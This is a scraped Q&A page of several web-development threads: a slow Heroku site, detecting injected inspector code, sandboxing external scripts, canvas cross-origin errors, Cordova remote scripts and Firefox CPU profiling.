The website testmysite claims that the website I'm working on is very slow, namely 9.8 seconds on 4g which is ridiculous.
My webapp requests geolocation first, but denies it immediately, so this is not where the slowness comes from.
The site is server-rendered, and sends scripts to the client to optimise.
The bundle analyzer is very dubious.
It claims that my total bundle size would be 750kb, but I strongly doubt that this is the case.
Even if it turns out that the testmysite is not a reliable source, I'd like to know why it says that my website is so slow, and what I can actually do to improve.
My vendor node modules are chunk split, because I want the browser to cache them individually.
My website is deployed here: https://zwoop-website-v001.herokuapp.com
Note that loading may take some time because I use the free service and the server falls asleep often.
Edit: my performance tab shows the following in Chrome:
I have really zero idea why that website says that my site is slow...
But if the measurement is used by search engines, then I do care.
* Answer: *
I just voted to re-open this question as #slebetman has helped me to troubleshoot some issues and I'd just like to formulate an answer.
First thing to note is that the free Heroku server that I run in production is located in Europe (this was an option you could choose), and it is unclear where the server from testmysite is located. #slebetman was located in East-Asia when running his test.
#slebetman mentioned that the network tab indicated for him a very slow load time for loading fonts (woff2), of about 2 seconds. This didn't occur for me, but as it turns out, these are font-awesome icons that are loaded from a CDN.
So while there is the logical thought of looking at performance in terms of script loading, interpretation and rendering, there may additionally be a latency issue related to third-party resources that are downloaded from another server. Even when your website is fast, you don't actually know if you have imported some module that requests additional resources.
Either of these things can be tracked through the performance or network tab of Google Chrome. An additional tip is to mimick a slow network (although I don't think this would actually track all problems that may occur on the network in terms of redirects, DNS resolutions etc as #slebetman mentions could be the case as well).
First thing to note is that the free Heroku server that I run in production is located in Europe (this was an option you could choose), and it is unclear where the server from testmysite is located.
#slebetman was located in East-Asia when running his test.
#slebetman mentioned that the network tab indicated for him a very slow load time for loading fonts (woff2), of about 2 seconds. This didn't occur for me, but as it turns out, these are font-awesome icons that are loaded from a CDN.
So while there is the logical thought of looking at performance in terms of script loading, interpretation and rendering, there may additionally be a latency issue related to third-party resources that are downloaded from another server. Even when your website is fast, you don't actually know if you have imported some module that requests additional resources.
Either of these things can be tracked through the performance or network tab of Google Chrome. An additional tip is to mimick a slow network (although I don't think this would actually track all problems that may occur on the network in terms of redirects, DNS resolutions etc as #slebetman mentions could be the case as well).
Related
Short version:
Is it possible to detect that someone added code to run inside a page from the browser inspector?
Long version:
Stock broker companies give their users the real time value of stocks, other free tools give you a delayed version of such values, for example 15 minutes old information.
There are other types of financial companies that have real time API to give you access to stock market at a cost.
What some people do is to keep their browsers open in the broker site and inject some JS code to observe the changes and post them elsewhere using XHR or web sockets. Not only network calls but also notification API and the draft Serial API can be exploited to put data out of the site.
This usually can't be done automatically due to the secure nature of logins requiring captcha or other methods. But once logged in and injected the hack will work until the tab is closed.
Usually this is not done by injecting script tags with outer files source, just pasting the whole code inside inspector and running it.
Now back to the question: Can a site know that code rogue code is running in their site?
I thought of some methods like a HASH of every variable used and if anything new is created it reloads the page or warn the user. But I'm not sure it is possible in nowadays JS, I guess document.all could help.
So yes, kinda, and also no kinda... there isn't a great cross browser solution to this as their implementation of the debug tools are all slightly different. This solution is probably the best I've found so far.
First some backstory:
We have a website that includes a Google Map in the usual way:
<script src="https://maps.googleapis.com/maps/api/js?v=....></script>
Then there is some of our javascript code that initializes the map. Now suddenly yesterday pages started to load but then freezed up entirely. In Chrome this resulted in having to force quit and restart. Firefox was smarter and allowed the user to stop script execution.
Now after some debugging, I found out that a previous developer had included the experimental version of the Google Maps API:
https://maps.googleapis.com/maps/api/js?v=3.exp
So it's likely that something has changed on Google's servers (which is completely understandable). This has uncovered a bug on our end, and both in combination caused the script to hang and freeze up the website and the browser.
Now ok, bug is found and fixed, no big harm done.
And now the actual question:
Is it possible to somehow sandbox these external script references so that they cannot crash my main site. I am loading a decent amount of external javascript files (tracking, analytics, maps, social) from their own servers.
However such code could change at all times and could have bugs that freeze my site. How can I protect my site? Is there a way to maybe define maximum allowable execution time?
I'm open to all kinds of suggestions.
It actually doesn't matter where the scripts are coming from - whether an external source or your own server. Either way they are run in the clients browser. And that makes it quite difficult to achieve your desired sandbox behavior.
You can get a sandbox inside your DOM with the usage of iframes and the keyword "sandbox". This way the content of this iframe is independent from the DOM of your actual website and you can include scripts independent as well. But this is beneficial mainly for security. I am not sure how it would result regarding the overall stability when one script has a bug like an endless loop or similar. But imho this is worth a try.
For further explanation see: https://www.html5rocks.com/en/tutorials/security/sandboxed-iframes/
This question has been asked a lot, but I just don't understand why this is happening to me.
Basically, I have a canvas, and an image, and when I try to do this:
var canvas = document.getElementById('somecanvas');
var ctx = canvas.getContext('2d');
var someimage = document.createElement('img');
someimage.setAttribute('src', 'img/someimage.png');
someimage.onload = function(){
ctx.drawImage(someimage, 0, 0, canvas.width, canvas.height);
data = ctx.getImageData(0,0,canvas.width,canvas.height);
}
I get the unsightly:
"Uncaught DOMException: Failed to execute 'getImageData' on 'CanvasRenderingContext2D': The canvas has been tainted by cross-origin data.
at HTMLImageElement.someimage.onload"
I should mention that I'm fairly new to pogramming, and even moreso to javascript. Should this be happening when I'm running it from file:\\?
I haven't found anyone having the exact same problem as me, and the explanations people got for the other questions had to do with the server the images were hosted on. But in this case it isn't hosted on a server, so I'm confused as to how it all works. Or rather, doesn't work.
For security reasons, many browsers will complain if you try to do certain things (canvas image drawing among them), if you use a file:// URL.
You really should serve both the page and the images from a local HTTP server in order to avoid those restrictions.
Ah, you've hit the CORS restriction, and I'm guessing here that you're encountering this in Google Chrome, which is notorious for being the most aggressive implementor of this. I've seen this a LOT.
CORS is a protocol, to prevent cross-origin content being inserted into a web page. It not only affects script files (as you might expect, because you don't want anyone to be able to inject malicious scripts into your web page), but also affects such resources as images and fonts.
The reason it affects images, is because malicious individuals discovered that they could use the HTML5 canvas object to copy the contents of your web page to a PNG file, and hoover personal data from that at will.You can imagine what would happen if you were engaging in Internet banking transactions whilst this happened to you!
But, and this is the annoying part you're encountering, stopping such malicious activity also impinges on legitimate uses of cross-origin resources (e.g, keeping all your images in a separate repository).
So how do you get around this?
On Firefox, you shouldn't have a problem. Firefox applies some intelligence to the matter, and recognises that images coming from the same file:// specification as your web page, are not actually cross-origin. It lets these through, so long as they're in the same directory on your hard drive as your web page.
Chrome, on the other hand, is much less permissive. It treats all such accesses as cross-origin, and implements security shutdowns the moment you try using getImageData() and putImageData() on a canvas.
There is a workaround, if you don't want to go to the trouble of installing and configuring your own local web server, but still want to use Chrome and its nice, friendly debugger. You have to create a shortcut, that points to your Chrome executable and runs it when you double click on it, but which starts Chrome up using a special command line flag:
--allow-file-access-from-files
Save this shortcut, labelling it something like "Chrome Debug Version" to remind you ONLY to use this for debugging your own code (you should never access the Internet proper with weakened security!), and you should be able to debug your code without issues from this point on.
But, if you're going to be doing a lot of debugging of this sort, the better long-term solution, is to install a web server, and configure it to serve up code from your desired directories every time you use the "localhost" URL. This is, I know, tedious and time consuming, and distracts from your desire to get coding, but once it's done, it's done and dusted, and solves your woes permanently.
If you really want to put your programming skills to the test, you could even write your own web server to do the job, using something like the node.js server side framework, but if you're new to JavaScript, that's a task you're better leaving until you have a lot more experience! But once your skills reach that point, doing that is a nice educational exercise that will also solve some of your other woes, once you've worked out how a web server works.
If you run with an established web server, you then, of course, have the fun of deciding which one involves the least headaches. Apache is powerful, but big. Hiawatha is both lightweight and secure, and would be my first choice if it wasn't for the fact that a 64-bit version is still not available (sigh), because the 32-bit version that ran on my old XP box was a joy to use. Nginx I know little about, but some people like it. Caveat emptor and all that.
all.
My team has been toying with the idea of developing an iOS app using Cordova, and recently, we've been looking into offloading as much of the main JavaScript as possible to our server, in an attempt to speed up fixing critical bugs.
The idea would be to have:
the native app containing all HTML, CSS, plugins and Cordova files
the main JavaScript added to the pages as external scripts from a server
a device-ready function for each page that will set up and start the main JavaScript once it's available
I have seen comments that Apple could be trusting of code that runs in a webview, but it does seem like projects like this could be a security issue.
I am aware of other questions and the like that touch on this, but I feel that the context was always different.
Thanks!
A year ago apple changed the iOS Developer Program Agreement to allow download of code, see the Section 3.3.2
3.3.2 An Application may not download or install executable code. Interpreted code may only be used in an Application if all scripts,
code and interpreters are packaged in the Application and not
downloaded. The only exception to the foregoing is scripts and code
downloaded and run by Apple's built-in WebKit framework, provided that
such scripts and code do not change the primary purpose of the
Application by providing features or functionality that are
inconsistent with the intended and advertised purpose of the
Application as submitted to the App Store.
So, as you are using cordova, and cordova uses WebKit framework, if you don't change the main purpose of the Application, you won't be rejected
The answer is it depends on how you use the system. The technical ding that hits most people is Apple iTunes Guidelines - 2.12
Apps that are not very useful, unique, are simply web sites bundled as Apps, or do not provide any lasting entertainment value may be rejected
It seems clear to me, but as a volunteer on the "official" phonegap forum, I'm often very blunt with people on this point. Nothing worst than months of work for nothings
On the Javascript idea, loading the javascript file from the web is not good practice. If your app ever loses the network, your app will be non-responsive. One app that I can name, that was growing by leaps and bounds, that has this problem is Word with Friends. I play and I can see the stall every time.
Make sure you App is always responsive and if not, give a short reasonable explanation. LIKE,"Opps, we can't find the Internet."
I have seen comments that Apple could be trusting of code that runs in a webview, but it does seem like projects like this could be a security issue.
Yes, Apple trust code that runs in webview, because it is not a browser. However, that does not make it secure. We have plenty of security issues and bugs. A recent security issues allows rogue code to insert weblinks into webview, and thereby allow the App to be used as an attack vector. Another recent security issue will launch rogue code from and mp3 file! And this bugs goes back to Android 2.0.
The cure is worst than the problem. It's a huge whitelist protocol that is confusing because of the bad documentation. Luckily, I should have a blog post in a few days; other people are working on blog posts too. my raw notes are online or read the current issues especially #10.
I am aware of other questions and the like that touch on this, but I feel that the context was always different.
Feel free to read my notes. The one i give to people all the time is:
Top Mistakes by Developers new to Cordova/Phonegap
But the root has more notes
Best of Luck.
Recently I have been having issues with Firefox 3 on Ubuntu Hardy Heron.
I will click on a link and it will hang for a while. I don't know if its a bug in Firefox 3 or a page running too much client side JavaScript, but I would like to try and debug it a bit.
So, my question is "is there a way to have some kind of process explorer, or task manager sort of thing for Firefox 3?"
I would like to be able to see what tabs are using what percent of my processor via the JavaScript on that page (or anything in the page that is causing CPU/memory usage).
Does anybody know of a plugin that does this, or something similar? Has anyone else done this kind of inspection another way?
I know about FireBug, but I can't imagine how I would use it to finger which tab is using a lot of resources.
Any suggestions or insights?
It's probably the awesome firefox3 fsync "bug", which is a giant pile of fail.
In summary
Firefox3 saves its bookmarks and history in an SQLite database
Every time you load a page it writes to this database several times
SQLite cares deeply that you don't lose your bookmarks, so each time it writes, instructs the kernel to flush it's database file to disk and ensure that it's fully written
Many variants of linux, when told to flush like that, flush EVERY FILE. This may take up to a minute or more if you have background tasks doing any kind of disk intensive stuff.
The kernel makes firefox wait while this flush happens, which locks up the UI.
So, my question is, is there a way to have some kind of process explorer, or task manager sort of thing for Firefox 3?
Because of the way Firefox is built this is not possible at the moment. But the new Internet Explorer 8 Beta 2 and the just announced Google Chrome browser are heading in that direction, so I suppose Firefox will be heading there too.
Here is a post ( Google Chrome Process Manager ),by John Resig from Mozilla and jQuery fame on the subject.
There's a thorough discussion of this that explains all of the fsync related problems that affected pre-3.0 versions of FF. In general, I have not seen the behaviour since then either, and really it shouldn't be a problem at all if your system isn't also doing IO intensive tasks. Firebug/Venkman make for nice debuggers, but they would be painful for figuring out these kinds of problems for someone else's code, IMO.
I also wish that there was an easy way to look at CPU utilization in Firefox by tab, though, as I often find myself with FF eating 100% CPU, but no clue which part is causing the problem.
XUL Profiler is an awesome extension that can point out extensions and client side JS gone bananas CPU-wise. It does not work on a per-tab basis, but per-script (or so). You can normally relate those .js scripts to your tabs or extensions by hand.
It is also worth mentioning that Google Chrome has built-in a really good task manager that gives memory and CPU usage per tab, extension and plugin.
[XUL Profiler] is a Javascript profiler. It
shows elapsed time in each method as a
graph, as well as browser canvas zones
redraws to help track down consuming
CPU chunks of code.
Traces all JS calls and paint events
in XUL and pages context. Builds an
animation showing dynamically the
canvas zones being redrawn.
As of FF 3.6.10 it is not up to date in that it is not marked as compatible anymore. But it still works and you can override the incompatibility with the equally awesome MR Tech Toolkit extension.
There's no "process explorer" kind of tool for Firefox; but there's https://developer.mozilla.org/en-US/docs/Archive/Mozilla/Venkman with profiling mode, which you could use to see the time spent by chrome (meaning non-content, that is not web-page) scripts.
From what I've read about it, DTrace might also be useful for this sort of thing, but it requires creating a custom build and possibly adding additional probes to the source. I haven't played with it myself yet.